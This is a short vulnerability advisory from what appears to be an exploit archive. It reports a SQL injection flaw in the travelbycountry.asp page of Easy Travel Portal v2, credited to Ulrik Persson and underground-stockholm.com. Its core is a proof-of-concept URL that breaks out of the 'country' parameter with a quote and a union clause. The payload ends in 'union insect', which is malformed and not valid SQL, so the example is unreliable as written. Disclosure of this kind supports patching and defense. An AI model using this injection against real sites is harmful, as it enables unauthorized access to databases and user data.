Easy Travel Portal v2 (travelbycountry.asp) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy Travel Portal v2 (travelbycountry.asp) SQL Injection Vulnerability
# Published : 2010-12-03
# Author : Ulrik Persson
# Previous Title : ASPSiteware Contact Directory 1.0 SQL Injection
# Next Title : ASPSiteware ASP Gallery 1.0 SQL Injection

TITLE: Easy Travel Portal "travelbycountry.asp" SQL Injection Vulnerability
PRODUCT: Easy Travel Portal v2
PRODUCT URL: http://www.softwebsnepal.com/travel_website_progamming_portal.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

VULN:

http://[host]/[path]/travelbycountry.asp?country=China%27%20union%20insect